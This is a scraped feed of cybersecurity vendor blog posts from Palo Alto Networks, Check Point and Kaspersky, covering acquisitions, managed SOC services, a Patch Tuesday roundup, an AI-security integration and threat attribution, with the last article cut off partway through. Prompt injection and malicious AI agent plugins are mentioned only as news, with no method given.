โŒ

Normal view

Securing the Agentic Endpoint

17 February 2026 at 14:10

Traditional Security Is Blind to the Agentic Endpoint

Modern endpoints are no longer defined only by executables. Increasingly, endpoint behavior is shaped by non-binary software, such as code packages, browser extensions, IDE plugins, scripts, local servers (including MCP), containers and model artifacts. They are installed directly by employees and developers without centralized oversight. Because these components are not classic binaries, they often fall outside the visibility and control of traditional endpoint security tooling.

AI agents compound this problem. They are legitimate tools that operate with the userโ€™s credentials and permissions, enabling them to read, write, move data and take privileged actions across systems. When compromised or misused, agents become the โ€œultimate insider.โ€ They can autonomously discover, invoke and even install additional components at machine speed, accelerating risk across an already expanding, largely unmanaged software layer.

Weaponizing Trusted Automation

This is not a future concern. The recent viral emergence of OpenClaw serves as a cautionary tale for the agentic era. Developed by a single individual in just one week, it rapidly secured millions of downloads while gaining broad permissions across users' emails, filesystems and shells. Within days, researchers identified 135,000 exposed instances and more than 800 malicious skills in its marketplace, underscoring how a single unvetted agent can create an immediate, global attack surface.

OpenClaw is not an outlier. Recent research highlights how quickly this risk is materializing:

  • Vibe Coding Threats: An AI extension in VS Code was found leaking code from 1.5 million developers. This tool could read any open file and send it back to the developer, collect mass files without user interaction, and track users with commercial analytics SDKs.
  • Malicious MCP Server: Koi documented the first malicious Model Context Protocol (MCP) server in the wild. When developers added a specific skill to tools like Claude Code or Cursor, it silently forwarded every email to the plugin creator. Whatโ€™s more, this capability was added later, after developers had already started using it.

Compounding this risk is the fact that autonomous agent actions are often difficult to trace or reconstruct, leaving Security Operations Centers (SOCs) without the visibility they need when an incident occurs.

A New Category of Protection

Complete endpoint security for the rapidly expanding risk of agentic AI calls for a new category of protection: Agentic Endpoint Security. Thatโ€™s why we announced our intent to acquire Koi, a pioneer in this space. Koi is designed to eliminate blind spots across the AI-native ecosystem and help organizations govern agentic tools safely.

Its technology rests on three core pillars:

  1. See All AI Software โ€“ Gain complete visibility into the AI tools, agents and non-binary software running in your environment.
  2. Understand Risks โ€“ Continuously analyze and understand the intent and risk level of all software and AI agents.
  3. Control the AI Ecosystem โ€“ Enforce policy in real-time to remediate issues and block risky behaviors.

Securing the Agentic Enterprise

We are convinced that Agentic Endpoint Security will soon become a standard requirement for enterprise security. Upon closing the proposed acquisition, we intend to integrate Koiโ€™s capabilities across our platforms to help our customers secure the AI-native workspace.

The wave of AI agents approaching the enterprise cannot be held back. Instead, we must offer secure tools that enable companies to confidently embrace agentic innovation.

Forward-Looking Statements

This blog post contains forward-looking statements that involve risks, uncertainties, and assumptions, including, but not limited to, statements regarding the anticipated benefits and impact of the proposed acquisition of Koi on Palo Alto Networks, Koi and their customers. There are a significant number of factors that could cause actual results to differ materially from statements made in this blog post, including, but not limited to: the effect of the announcement of the proposed acquisition on the partiesโ€™ commercial relationships and workforce; the ability to satisfy the conditions to the closing of the acquisition, including the receipt of required regulatory approvals; the ability to consummate the proposed acquisition on a timely basis or at all; significant and/or unanticipated difficulties, liabilities or expenditures relating to proposed transaction, risks related to disruption of management time from ongoing business operations due to the proposed acquisition and the ongoing integration of other recent acquisitions; our ability to effectively operate Koiโ€™s operations and business following the closing, integrate Koiโ€™s business and products into our products following the closing, and realize the anticipated synergies in the transaction in a timely manner or at all; changes in the fair value of our contingent consideration liability associated with acquisitions; developments and changes in general market, political, economic and business conditions; failure of our platformization product offerings; risks associated with managing our growth; risks associated with new product, subscription and support offerings; shifts in priorities or delays in the development or release of new product or subscription or other offerings or the failure to timely develop and achieve market acceptance of new products and subscriptions, as well as existing products, subscriptions and support offerings; failure of our product offerings or business strategies in general; defects, errors, or vulnerabilities in our products, subscriptions or support offerings; our customersโ€™ purchasing decisions and the length of sales cycles; our ability to attract and retain new customers; developments and changes in general market, political, economic, and business conditions; our competition; our ability to acquire and integrate other companies, products, or technologies in a successful manner; our debt repayment obligations; and our share repurchase program, which may not be fully consummated or enhance shareholder value, and any share repurchases which could affect the price of our common stock.

Additional risks and uncertainties that could affect our financial results are included under the captions "Risk Factors" and "Management's Discussion and Analysis of Financial Condition and Results of Operations" in our Quarterly Report on Form 10-Q filed with the SEC on November 20, 2025, which is available on our website at investors.paloaltonetworks.com and on the SEC's website at www.sec.gov. Additional information will also be set forth in other filings that we make with the SEC from time to time. All forward-looking statements in this blog post are based on information available to us as of the date hereof, and we do not assume any obligation to update the forward-looking statements provided to reflect events that occur or circumstances that exist after the date on which they were made.

ย 

The post Securing the Agentic Endpoint appeared first on Palo Alto Networks Blog.

Introducing Unit 42 Managed XSIAM 2.0

17 February 2026 at 12:01

24/7 Managed SOC Built for Tomorrow's Threats

The window for defense has collapsed, and most SOCs werenโ€™t built for the speed of todayโ€™s attacks. According to the 2026 Unit 42ยฎ Global Incident Response Report, some end-to-end attacks now unfold in under an hour. Attacks that used to take days or weeks now happen in minutes.

Most traditional SOC models are trapped in a cycle of alert overload, fragmented tools and limited engineering capacity that slow investigations and delay response. Traditional SIEM and MDR models were designed to react to alerts. They were not designed to continuously improve detections, correlations and response with threats that move at machine speed. Over time, that gap between attacker speed and defender capability keeps widening, and itโ€™s exactly why we built Unit 42 Managed XSIAM 2.0 (MSIAM).

Today marks the availability of the next evolution of our managed SOC offering โ€“ one that reflects how modern security operations must run in todayโ€™s threat landscape. MSIAM 2.0 is built on Cortex XSIAMยฎ, Palo Alto Networks SOC transformation platform, and operated by Unit 42 analysts, threat hunters, responders and SOC engineers who handle the most complex incidents in the world. With this solution, Unit 42 provides organizations with a 24/7 managed SOC that delivers continuous detection, investigation and full-cycle remediation across the entire attack surface while improving operations over time.

We donโ€™t just manage alerts. Unit 42 continuously engineers detections, correlations and response playbooks within XSIAM, refining them as attacker behavior evolves. This ongoing engineering ensures defenses improve over time, driven by real-world incidents and frontline threat intelligence, not static rules that quickly fall behind.

Why Managed XSIAM 2.0 Is Different

Elite SOC on Day One

We want SOC teams up and running as fast as possible. Experts lead onboarding, data mapping and configuration, and then your managed SOC team takes responsibility for operating and optimizing XSIAM on a day-to-day basis. The result is a SOC that improves over time without adding operational burden.

Every Threat Exposed

Unit 42 goes beyond reactive monitoring with continuous, proactive threat hunting across the entire attack surface. When a new threat is found in the wild, we produce threat impact reports that show how those techniques apply to each customerโ€™s environment. We then translate those insights into custom detections and automated response actions, while also monitoring and investigating the correlation rules your team creates. Both the global threat intelligence and your unique use cases are backed by our 24/7 analysis, closing gaps quickly and strengthening defenses over time.

We also now support both native and third-party EDR telemetry, so organizations can benefit from Unit 42 expertise and Cortexยฎ AI-driven analytics, regardless of the security technologies they use today. This enables customers to receive the strongest possible managed defense now, while creating a natural, low-friction path toward deeper platform consolidation as their environment evolves.

Machine-Speed Response

When incidents escalate, we donโ€™t just hand you a ticket; we take ownership. Collaborating with your team, we establish pre-authorized workflows to execute immediate responses across your entire environment, from endpoints and firewalls to identity and cloud. We pair the platformโ€™s native speed with expert oversight. By validating threat context and business impact, every response action is precise and safe, giving you the confidence to unleash full-cycle remediation. This allows MSIAM 2.0 to move seamlessly from detection to resolution with both velocity and precision.

And we stand behind our solution with a Breach Response Guarantee. If a complex incident strikes, you have the worldโ€™s best responders in your corner with up to 250 hours of Unit 42 Incident Response included. This built-in coverage removes the administrative hurdles of crisis response, enabling our experts to immediately transition from monitoring to deep forensic investigation and complete eradication, so you can focus on recovery.ย 

Proven in the Real World with the Green Bay Packers

Working with Unit 42 and the Cortex XSIAM platform, the Green Bay Packers modernized their security across a complex hybrid environment, demonstrating what Unit 42's managed services deliver in real-world operations. By consolidating telemetry and accelerating investigation and response, they reduced response times from hours to minutes, investigated 54% more alerts and saved over 120 hours of analyst time without adding headcount.

These outcomes reflect the key benefits of MSIAM: Unit 42 experts working to apply frontline intelligence as new attacker behavior emerges, translating it into reporting and tailored detections that improve response where it matters most. When a machine-speed platform is operated by experts handling real incidents every day, defenses continuously strengthen as threats evolve.

The Future of the SOC

Unit 42 MSIAM 2.0 helps your SOC operate as it should by combining AI-driven analytics and automation with expert-led operations and engineering. This combination provides teams with the confidence that their defenses are always on, always improving and ready when it matters most. Thatโ€™s the SOC that security leaders need today, and the one weโ€™re building for tomorrow.

MSIAM is now delivered through two service tiers, Pro and Premium. Organizations can start where they are and grow at their own pace. Pro provides AI-driven managed SOC operations with continuous detection, investigation and response. Premium extends into full-lifecycle SOC engineering, with designated experts and customized detections, automation and tailored response playbooks as your security maturity grows.

To learn more about Managed XSIAM 2.0, join us at Symphony 2026, a Palo Alto Networks premier virtual SOC event, where Unit 42 and Cortexยฎ experts will share frontline threat intelligence from the new 2026 Unit 42 Incident Response Report alongside real-world SOC transformation insights from organizations operating at machine speed.

The post Introducing Unit 42 Managed XSIAM 2.0 appeared first on Palo Alto Networks Blog.

Securing Every Identity in the Age of AI

11 February 2026 at 16:00

The enterprise security landscape has reached an inflection point. As organizations accelerate adoption of cloud, automation and artificial intelligence, identity has become the primary attack surface of the modern enterprise. Not because defenses have weakened, but because identities have multiplied and now operate continuously at machine speed, often with elevated access.

When attackers succeed today, it almost always starts with identity. Identity is now the number one attack vector. Eighty-seven percent of organizations experienced at least two successful, identity-centric breaches in the past 12 months. These breaches can lead to outages, regulatory exposure, financial loss and reputational damage.

This reality is why today marks such a pivotal moment. CyberArk is officially joining Palo Alto Networks. This step reflects a shared conviction that identity security is no longer a supporting function. To stay ahead of modern attackers, organizations need best-in-class identity security that is deeply integrated into their broader security strategy.

The Reality of the Modern Identity Attack Surface

For years, identity security focused on a relatively small population of human users, administrators and periodic access reviews. That model no longer matches reality.

Todayโ€™s enterprises depend on vast numbers of machine identities, including workloads, services, APIs and increasingly, autonomous AI agents. Machine identities now outnumber human identities by more than 80 to 1, while 75 percent of organizations acknowledge that their human identities are governed by outdated, overly permissive privileged models.

Attackers have adapted. Rather than breaking in through vulnerabilities, they increasingly log in using stolen credentials or by exploiting excessive, poorly governed access. Identity-based attacks have become the dominant breach vector because identity sprawl and standing privilege create opportunities that are difficult to detect with traditional tools.

Yet many identity programs remain fragmented. Access management, privileged access and governance often operate in silos, with delayed visibility and manual processes. Risk accumulates silently between reviews, leaving security teams reacting after the fact.

This is the problem CyberArk was built to solve.

Why Identity Security Must Be Continuous

Securing identities in this environment requires a fundamentally different approach. Identity risk changes constantly as new identities are created, permissions shift and systems scale dynamically. Controls must operate continuously, not episodically.

This means three things:

First, organizations need real-time visibility into who or what has access to critical systems across human, machine and AI identities.

Second, privilege must be applied dynamically. Access should be granted only when needed and removed automatically when it is no longer required. Standing privilege should be the exception, not the norm.

Third, governance must evolve from periodic compliance exercises to continuous enforcement that adapts as environments change.

This is the identity security vision that has guided CyberArk for decades and why joining Palo Alto Networks is such a natural next step.

Elevating Identity to a Core Platform

As part of Palo Alto Networks, CyberArk elevates identity security to a core platform pillar.

CyberArkโ€™s Identity Security Platform is proven at enterprise scale and trusted to protect some of the worldโ€™s most critical environments. Our approach extends privileged access principles beyond a narrow set of administrators to every identity that matters.

By treating every identity as potentially privileged, organizations can dramatically reduce their attack surface. Excessive access is identified. Unnecessary privilege is removed. Attackers lose the ability to move laterally by using stolen credentials.

Elevating identity security to a platform level also enables tighter alignment with network security, cloud security and security operations. Identity becomes a powerful control plane that informs policy enforcement, detection and response across the enterprise, delivering a more complete and actionable view of risk.

Securing the AI-Driven Enterprise

This shift is especially critical as organizations deploy AI-driven systems and autonomous agents.

These systems often require persistent access to sensitive data and infrastructure, making them attractive targets for attackers and difficult to govern with legacy identity models. Most enterprises today lack effective identity security controls for machine and AI-driven systems, leaving these identities overprivileged and undergoverned.

Applying privileged access principles universally enables organizations to secure AI-driven environments without slowing innovation. Identity security becomes the trust layer that allows enterprises to scale AI responsibly, ensuring access is controlled, monitored and adjusted dynamically as systems evolve.

What This Means for Customers

For customers, elevating identity security to a core platform delivers tangible outcomes.

Organizations gain clearer insight into identity access and risk across human, machine and agentic identities. They gain stronger protection against credential-based attacks by limiting excessive privilege and reducing the paths that attackers rely on to move undetected. They also gain operational simplicity by replacing fragmented tools and manual governance with consistent, scalable controls.

Most importantly, customers gain confidence. Confidence to adopt cloud, automation and AI, knowing that identity risk is governed continuously. Confidence that security can keep pace with change rather than reacting after the fact.

Moving Forward

CyberArkโ€™s Identity Security solutions will continue to be available as a standalone platform. Customers can rely on the solutions they trust today while benefiting from an accelerated roadmap focused on resilience, simplicity and improved security outcomes.

At the same time, integration is underway to bring CyberArkโ€™s best-in-class identity security capabilities more deeply into the Palo Alto Networks security ecosystem. Our priority is to listen closely to customers, meet their immediate needs, and build the path forward together.

The AI era is redefining how enterprises operate and how attackers operate alongside them. Securing every identity, human, machine and AI agent is no longer optional. It is foundational.

By bringing CyberArk into Palo Alto Networks, we are taking a decisive step toward redefining identity security for the modern enterprise and helping our customers stay secure as they innovate at speed.

The post Securing Every Identity in the Age of AI appeared first on Palo Alto Networks Blog.

Patch Tuesday, February 2026 Edition

10 February 2026 at 22:49

Microsoft today released updates to fix more than 50 security holes in its Windows operating systems and other software, including patches for a whopping six โ€œzero-dayโ€ vulnerabilities that attackers are already exploiting in the wild.

Zero-day #1 this month is CVE-2026-21510, a security feature bypass vulnerability in Windows Shell wherein a single click on a malicious link can quietly bypass Windows protections and run attacker-controlled content without warning or consent dialogs. CVE-2026-21510 affects all currently supported versions of Windows.

The zero-day flawย CVE-2026-21513 is aย security bypass bug targeting MSHTML, the proprietary engine of the default Web browser in Windows. CVE-2026-21514 is a related security feature bypass in Microsoft Word.

The zero-day CVE-2026-21533 allows local attackers to elevate their user privileges to โ€œSYSTEMโ€ level access in Windows Remote Desktop Services. CVE-2026-21519 is a zero-day elevation of privilege flaw in the Desktop Window Manager (DWM), a key component of Windows that organizes windows on a userโ€™s screen. Microsoft fixed a different zero-day in DWM just last month.

The sixth zero-day is CVE-2026-21525, a potentially disruptive denial-of-service vulnerability in the Windows Remote Access Connection Manager, the service responsible for maintaining VPN connections to corporate networks.

Chris Goettl at Ivanti reminds us Microsoft has issued several out-of-band security updates since Januaryโ€™s Patch Tuesday. On January 17, Microsoft pushed a fix that resolved a credential prompt failure when attempting remote desktop or remote application connections. On January 26, Microsoft patched a zero-day security feature bypass vulnerability (CVE-2026-21509) in Microsoft Office.

Kev Breen at Immersive notes that this monthโ€™s Patch Tuesday includes several fixes for remote code execution vulnerabilities affecting GitHub Copilot and multiple integrated development environments (IDEs), including VS Code, Visual Studio, and JetBrains products. The relevant CVEs are CVE-2026-21516, CVE-2026-21523, and CVE-2026-21256.

Breen said the AI vulnerabilities Microsoft patched this month stem from a command injection flaw that can be triggered through prompt injection, or tricking the AI agent into doing something it shouldnโ€™t โ€” like executing malicious code or commands.

โ€œDevelopers are high-value targets for threat actors, as they often have access to sensitive data such as API keys and secrets that function as keys to critical infrastructure, including privileged AWS or Azure API keys,โ€ Breen said. โ€œWhen organizations enable developers and automation pipelines to use LLMs and agentic AI, a malicious prompt can have significant impact. This does not mean organizations should stop using AI. It does mean developers should understand the risks, teams should clearly identify which systems and workflows have access to AI agents, and least-privilege principles should be applied to limit the blast radius if developer secrets are compromised.โ€

Theย SANS Internet Storm Centerย has aย clickable breakdown of each individual fix this month from Microsoft, indexed by severity and CVSS score. Enterprise Windows admins involved in testing patches before rolling them out should keep an eye on askwoody.com, which often has the skinny on wonky updates. Please donโ€™t neglect to back up your data if it has been a while since youโ€™ve done that, and feel free to sound off in the comments if you experience problems installing any of these fixes.

From Solo to Squad: The Evolution of Cyber Security Training in the AI Era

By: anap
9 February 2026 at 13:00

Generative AI is transforming cyber defense. Technical expertise remains critical, but AI-driven threats demand more than individual skill โ€“ they require the collective intelligence of the organizationโ€™s SOC. To understand how businesses are adapting, Infinity Global Services analyzed training consumption trends from 2023 to 2025. The findings reveal a decisive shift from individual courses to team-based subscriptions, signaling a new approach to workforce development in the age of AI. The Data: A Shift in Mindset Infinity Global Servicesโ€™ training data shows a clear change in procurement strategies. Individual course purchases have declined by 33%, while team-based subscription models have surged, [โ€ฆ]

The post From Solo to Squad: The Evolution of Cyber Security Training in the AI Era appeared first on Check Point Blog.

The Power of Glean and Prisma AIRS Integration

Accelerating Secure AI Adoption

The rapid adoption of AI is transforming the enterprise, unlocking unprecedented productivity and accelerating workflows at a record pace. However, this velocity creates a new productivity paradox: The faster AI moves, the more it can expose the organization to entirely new categories of risk. Without specialized guardrails, unchecked AI can inadvertently bypass company policies, violate legal standards, or ignore ethical norms.

To bridge this gap, Glean, the Work AI platform, and Palo Alto Networks Prismaยฎ AIRSโ„ข have integrated to provide an essential security layer that empowers organizations to adopt generative AI with confidence, helping ensure that massive productivity gains never come at the cost of trust, security or compliance.

How Glean and Prisma AIRS work together.
Glean and Prisma AIRS stop AI attacks in runtime.
Display of how a prompt injection is blocked by a Work AI assistant.
Prompt injection threat blocked in real time.

Real-Time Defense Against the Modern AI Threat Surface

Generic filters often fail to catch the sophisticated nuances of AI-driven attacks. The integration of Glean and Prisma AIRS provides a purpose-built defense that acts in real time across three critical areas:

1. Neutralizing Prompt Injection

Prompt injections are malicious instructions designed to trick AI models into ignoring their safety protocols, potentially leading to the exposure of sensitive data or the execution of unauthorized actions.

For instance, an attacker could craft a prompt that causes the AI to leak its own system instructions leading to data loss. Glean and Prisma AIRS instantly detect these sophisticated manipulation attempts, blocking the request and notifying the user before the organization's integrity is compromised.

2. Safeguarding Against Harmful and Toxic Content

AI interactions must remain professional, ethical and safe.

By scanning both user prompts and AI-generated responses against organizational policy, Glean and Prisma AIRS automatically block requests that contain toxic, biased, or otherwise harmful content. This enables AI to remain a positive and productive asset for the entire workforce.

3. Preventing Malicious Code and Unsafe URLs

AI models can sometimes generate unsafe code snippets, get data from a poisoned source, or provide harmful links that lead to phishing sites or malware downloads.

For example, a developer might ask an AI assistant for a code library to process data, and the model could inadvertently suggest a malicious package that compromises the application. The Glean and Palo Alto Networks integration provides a crucial safety net, inspecting all generated content for malicious patterns and preventing employees from interacting with risky URLs, keeping the entire AI-driven development and research lifecycle secure.

Secure AI in Minutes with Out of the Box Integration

The true power of the Glean and Palo Alto Networks partnership lies in its simplicity. Weโ€™ve removed the friction of complex security configurations, enabling organizations to realize value immediately through a seamless, out of the box integration.

Onboarding is completed in three simple steps within the Glean admin console:

  1. Navigate to AI Security and select Palo Alto Networks AI Runtime Securityโ„ข.
  2. Paste your Prisma AIRS Runtime Security API Key.
  3. Click Save.
Glean Admin Console for AI security.
Activate Prisma AIRS from the Glean admin console.

With these three clicks, the integration is live, providing an invisible but invincible layer of defense across your AI chats and agent interactions.

AI security showing rundown of policy violation status.
Glean admin panel showcasing all findings.

Partnering for a Secure AI Future

As enterprises scale their AI initiatives, specialized security becomes non-negotiable. Prisma AIRS provides the advanced, granular protection needed to catch threats that standard vendors can often miss, and its integration with Glean delivers that protection exactly where work happens.

Drive productivity, foster innovation, and secure your future with Glean and Palo Alto Networks.

Key Takeaways

  • Real-Time Threat Mitigation: Instantly block prompt injections, toxic content, and malicious code, transforming AI from a risk factor into a secure asset.
  • Frictionless Deployment: Achieve comprehensive AI security in minutes with a simple, three-click API integration within the Glean console.
  • Time to value: Scale AI adoption across the enterprise by ensuring every interaction complies with internal policies and global safety standards.

Ready to Deploy Secure AI? To explore how this integration can protect your organization, sign up for the Glean and Palo Alto Networks upcoming webinar.

The post The Power of Glean and Prisma AIRS Integration appeared first on Palo Alto Networks Blog.

New Year, New Program, New Opportunities

5 February 2026 at 00:30

Our Reimagined Partner Program Is Here

The cybersecurity landscape continues to evolve at an extraordinary pace. AI-driven threats are expanding the attack surface, demanding faster, more precise responses and greater resilience. At the same time, customers want fewer vendors, deeper integrations and trusted advisers who can help them achieve positive, measurable outcomes and reduce unnecessary complexity.

Meeting these challenges and expectations requires a potent combination of world-class technology and world-class partnership. Thatโ€™s why, in 2026, Palo Alto Networks is evolving our partner program and unifying it with our value exchange framework.

We are excited to share that we have rolled out new program features. The changes weโ€™re introducing are designed to strengthen how we work with our ecosystem across every partner motion โ€“ from resale and cosell to delivery, support and managed services. The goal of this evolution is simple: Create clearer, more scalable paths for growth and mutual success.

Why Weโ€™re Evolving to Meet the Demands of a Changing Market

The same forces transforming the cybersecurity landscape are also changing what it means to be a successful partner. As customers reduce their reliance on disparate point solutions, choose to consolidate platforms and lean harder on AI-driven automation, theyโ€™re turning to partners for much more than technology procurement. They want design guidance, integration expertise and ongoing, outcome-focused support.

Our partners are also clear about what they need from us. Theyโ€™ve asked Palo Alto Networks for a partner program that is simpler to engage with, more predictable in how it rewards impact, and more closely aligned with how they build and deliver value across resale, services and managed offerings. Our partners also seek less complexity and more room to differentiate through their own investments and innovation.

The evolution of our partner program is our response not only to feedback from our partners but also to extensive market research. It will bring greater structure where our partners seek consistency, greater flexibility in how and where they innovate, as well as greater transparency in how the value they deliver is recognized. These strategic changes will help ensure our mutual customers benefit the most when they work with our vast and diverse ecosystem in todayโ€™s platform-first, outcome-driven marketplace.

A Unified Growth Model = Partner Program + Value Exchange

Palo Alto Networks NextWave Partner Program and value exchange framework were designed to work together, not as separate tracks, but as one powerful engine for driving growth. This unified framework makes it easier for partners to engage with us and get the most from the partner program. It rewards impact, expertise and customer success rather than focusing narrowly on transactions.

This evolved model isย built on the foundation of three guiding principles:

  • Predictability โ€“ Consistent expectations and program structures that support long-term planning.
  • Repeatability โ€“ Enablement and tools that help partners scale practices with confidence.
  • Profitability โ€“ Incentives, rebates and routes to growth tied directly to customer value.

The new framework can help partners build sustainable businesses while accelerating the adoption of platformized AI-powered security. Letโ€™s take a look at the many benefits our partner ecosystem may experience through this reimagined program.

What Our Partners Can Expect

Our redesigned partner program enables greater alignment between the investments you make and the outcomes you achieve. Across Palo Alto Networks NextWave Partner Program, weโ€™re strengthening how partners can scale, differentiate and grow their business with improvements in three key areas.

1. Access That Accelerates Scale

Weโ€™re expanding access to the tools and resources that can help partners reach customers faster and deliver solutions with confidence:

  • Broader on-demand learning and persona-based enablement.
  • Labs and demos that make it easier to showcase platform value.
  • Improved quoting tools and API-driven automation that can ease operational friction.
  • Enhanced support resources that improve quality delivery and the customer experience.

These and other capabilities can help reduce complexity and accelerate your ability to propose, design and deploy high-quality, platform-based solutions for customers.

2. Commitment That Reflects Intentional Investment

As the cybersecurity market evolves, so does the definition of partnership. Our newly evolved program introduces clearer expectations and meaningful rewards for partners who invest in specialization and growth. Weโ€™re raising the bar on the programโ€™s standards:

  • Higher bookings and growth targets.
  • Increased specialization depth across key areas.
  • New targeted rebates aligned to value creation.
  • A strengthened global distribution strategy to support scale.

These enhancements will recognize partners who lean into the platform approach and drive meaningful impact for customers.

3. Profitability That Helps Fuel Long-Term Growth

A top priority for our updated program is helping partners build predictable, repeatable and profitable business practices in 2026 and beyond. Here are some of the measures weโ€™re introducing:

  • Default service quoting (Authorized Support Center and Authorized Professional Services) to help strengthen delivery economics.
  • Incentive model that drives higher partner profitability on AI-enabled security solutions.
  • Programmatic discounts and improved quoting tools to speed sales cycles.
  • A new Partner Development Fund (PDF) to help partners build capabilities and pipeline.

Our aim is to create a more consistent, performance-driven model that supports partner strategy today and creates room for expansion tomorrow.

What These Changes Mean for Customers

A more connected and enabled partner ecosystem doesnโ€™t just benefit our partners. It elevates the entire customer experience.

Customers can expect smoother, simplified engagement with trusted cybersecurity advisers who speak the same language and share the same goals. And with greater consistency across sales, delivery and ongoing support, organizations wonโ€™t be saddled by complexity that slows transformation and makes it harder to adopt, build and deploy AI boldly yet safely.

Customers can also move forward with greater confidence in expanding their use of our Palo Alto Networks integrated, AI-driven cybersecurity platform, knowing their partners are equipped with the training, tools and know-how to help guide them every step of the way.

Driving Shared Success Through the Value Exchange

The value exchange in cybersecurity reinforces a principle that has long guided the approach of Palo Alto Networks to partnering: Growth follows value creation. Itโ€™s the foundation for how we work with our ecosystem, strengthening connections among partners, customers and our platform.

This is the power of a global ecosystem moving with purpose. When platform innovation, partner expertise and customer needs are aligned, everything moves faster and desired outcomes are more readily achieved. Deployments accelerate, architectures are simplified, and enterprises gain the resilient security postures needed to withstand the pressures of an AI-driven threat landscape.

Whatโ€™s Next

We encourage you to review a set of short videos in The Learning Center for Partners, which provide more details about the planned changes to Palo Alto Networks NextWave Partner Program.

We believe the year ahead offers one of the most significant opportunities for innovation and growth our ecosystem has ever seen. By reimagining our partner program and value exchange framework, Palo Alto Networks is doubling down on the promise of our shared success, mutual growth and long-term value.

To our partners, thank you, as always, for your commitment, collaboration and belief in what weโ€™re creating together. Whatโ€™s ahead is more than an evolution of a long-standing and successful partner program. Itโ€™s a new era of partnering with precision to build the future of cybersecurity.


Key Takeaways

  • A reimagined partner program accelerates sustainable growth. Beginning in early February, a single, scalable framework will guide every partner motion and reward meaningful impact.
  • Partners have more ways to scale and differentiate. Expanded enablement, automation and incentives can help build stronger, more profitable practices.
  • Customers will benefit from more consistent experiences. A more aligned ecosystem enables simpler engagement, smoother delivery and increased confidence in the platform.

Forward-Looking Statements

This blog contains forward-looking statements that involve risks, uncertainties and assumptions, including, without limitation, statements regarding the benefits, impact, or performance or potential benefits, impact or performance of our products and technologies or future products and technologies. These forward-looking statements are not guarantees of future performance, and there are a significant number of factors that could cause actual results to differ materially from statements made in this blog. We identify certain important risks and uncertainties that could affect our results and performance in our most recent Annual Report on Form 10-K, our most recent Quarterly Report on Form 10-Q, and our other filings with the U.S. Securities and Exchange Commission from time-to-time, each of which are available on our website at investors.paloaltonetworks.com and on the SEC's website at www.sec.gov. All forward-looking statements in this blog are based on information available to us as of the date hereof, and we do not assume any obligation to update the forward-looking statements provided to reflect events that occur or circumstances that exist after the date on which they were made.

The post New Year, New Program, New Opportunities appeared first on Palo Alto Networks Blog.

How does cyberthreat attribution help in practice?

2 February 2026 at 18:36

Not every cybersecurity practitioner thinks itโ€™s worth the effort to figure out exactly whoโ€™s pulling the strings behind the malware hitting their company. The typical incident investigation algorithm goes something like this: analyst finds a suspicious file โ†’ if the antivirus didnโ€™t catch it, puts it into a sandbox to test โ†’ confirms some malicious activity โ†’ adds the hash to the blocklist โ†’ goes for coffee break. These are the go-to steps for many cybersecurity professionals โ€” especially when theyโ€™re swamped with alerts, or donโ€™t quite have the forensic skills to unravel a complex attack thread by thread. However, when dealing with a targeted attack, this approach is a one-way ticket to disaster โ€” and hereโ€™s why.

If an attacker is playing for keeps, they rarely stick to a single attack vector. Thereโ€™s a good chance the malicious file has already played its part in a multi-stage attack and is now all but useless to the attacker.ย Meanwhile, the adversary has already dug deep into corporate infrastructure and is busy operating with an entirely different set of tools. To clear the threat for good, the security team has to uncover and neutralize the entire attack chain.

But how can this be done quickly and effectively before the attackers manage to do some real damage? One way is to dive deep into the context. By analyzing a single file, an expert can identify exactly whoโ€™s attacking his company, quickly find out which other tools and tactics that specific group employs, and then sweep infrastructure for any related threats. There are plenty of threat intelligence tools out there for this, but Iโ€™ll show you how it works using our Kaspersky Threat Intelligence Portal.

A practical example of why attribution matters

Letโ€™s say we upload a piece of malware weโ€™ve discovered to a threat intelligence portal, and learn that itโ€™s usually being used by, say, the MysterySnail group. What does that actually tell us? Letโ€™s look at the available intel:

MysterySnail group information

First off, these attackers target government institutions in both Russia and Mongolia. Theyโ€™re a Chinese-speaking group that typically focuses on espionage. According to their profile, they establish a foothold in infrastructure and lay low until they find something worth stealing. We also know that they typically exploit the vulnerability CVE-2021-40449. What kind of vulnerability is that?

CVE-2021-40449 vulnerability details

As we can see, itโ€™s a privilege escalation vulnerability โ€” meaning itโ€™s used after hackers have already infiltrated the infrastructure. This vulnerability has a high severity rating and is heavily exploited in the wild. So what software is actually vulnerable?

Vulnerable software

Got it: Microsoft Windows. Time to double-check if the patch that fixes this hole has actually been installed. Alright, besides the vulnerability, what else do we know about the hackers? It turns out they have a peculiar way of checking network configurations โ€” they connect to the public site 2ip.ru:

Technique details

So it makes sense to add a correlation rule to SIEM to flag that kind of behavior.

Nowโ€™s the time to read up on this group in more detail and gather additional indicators of compromise (IoCs) for SIEM monitoring, as well as ready-to-use YARA rules (structured text descriptions used to identify malware). This will help us track down all the tentacles of this kraken that might have already crept into corporate infrastructure, and ensure we can intercept them quickly if they try to break in again.

Additional MysterySnail reports

Kaspersky Threat Intelligence Portal provides a ton of additional reports on MysterySnail attacks, each complete with a list of IoCs and YARA rules. These YARA rules can be used to scan all endpoints, and those IoCs can be added into SIEM for constant monitoring. While weโ€™re at it, letโ€™s check the reports to see how these attackers handle data exfiltration, and what kind of data theyโ€™re usually hunting for. Now we can actually take steps to head off the attack.

And just like that, MysterySnail, the infrastructure is now tuned to find you and respond immediately. No more spying for you!

Malware attribution methods

Before diving into specific methods, we need to make one thing clear: for attribution to actually work, the threat intelligence provided needs a massive knowledge base of the tactics, techniques, and procedures (TTPs) used by threat actors. The scope and quality of these databases can vary wildly among vendors. In our case, before even building our tool, we spent years tracking known groups across various campaigns and logging their TTPs, and we continue to actively update that database today.

With a TTP database in place, the following attribution methods can be implemented:

  1. Dynamic attribution: identifying TTPs through the dynamic analysis of specific files, then cross-referencing that set of TTPs against those of known hacking groups
  2. Technical attribution: finding code overlaps between specific files and code fragments known to be used by specific hacking groups in their malware

Dynamic attribution

Identifying TTPs during dynamic analysis is relatively straightforward to implement; in fact, this functionality has been a staple of every modern sandbox for a long time. Naturally, all of our sandboxes also identify TTPs during the dynamic analysis of a malware sample:

TTPs of a malware sample

The core of this method lies in categorizing malware activity using the MITRE ATT&CK framework. A sandbox report typically contains a list of detected TTPs. While this is highly useful data, itโ€™s not enough for full-blown attribution to a specific group. Trying to identify the perpetrators of an attack using just this method is a lot like the ancient Indian parable of the blind men and the elephant: blindfolded folks touch different parts of an elephant and try to deduce whatโ€™s in front of them from just that. The one touching the trunk thinks itโ€™s a python; the one touching the side is sure itโ€™s a wall, and so on.

Blind men and an elephant

Technical attribution

